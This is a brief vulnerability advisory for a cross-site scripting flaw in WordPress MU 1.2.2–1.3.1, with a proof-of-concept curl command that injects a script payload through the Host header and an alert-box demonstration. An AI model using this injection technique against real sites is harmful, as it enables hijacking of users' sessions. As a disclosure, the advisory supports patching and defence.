WordPress MU versions 1.2.2 through 1.3.1 wp-includes/wpmu-functions.php suffers from a cross site scripting vulnerability.
04732f8d93fe0ce601091242ec0471c3a3dc3936c54d2536bb4d0ffd27437709
An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI.
The following proof of concept is available:
curl -H "Cookie: my cookies here" -H "Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html